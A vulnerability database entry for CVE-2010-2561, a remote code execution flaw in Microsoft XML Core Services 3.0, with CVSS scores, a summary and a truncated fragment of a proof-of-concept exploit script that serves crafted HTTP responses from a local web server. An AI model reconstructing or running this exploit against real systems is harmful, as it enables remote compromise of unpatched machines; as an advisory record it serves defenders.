9.3
CVSSv2

CVE-2010-2561

Published: 11/08/2010 Updated: 12/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Microsoft XML Core Services (aka MSXML) 3.0 does not properly handle HTTP responses, which allows remote malicious users to execute arbitrary code or cause a denial of service (memory corruption) via a crafted response, aka "Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption Vulnerability."

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft xml core services 3.0

Exploits

# Sources: # skyphercom/indexphp/2010/08/10/ms10-051/ # codegooglecom/p/skylined/issues/detail?id=17 # import os, re, socket; webserver_port = 28876; replies = { r'^/$': ('text/html', """ <SCRIPT> iCounter = 0 function go() { var request_url = locationprotocol + "//" + locationhost + "/RandomHTTP?counter=" + (iC ...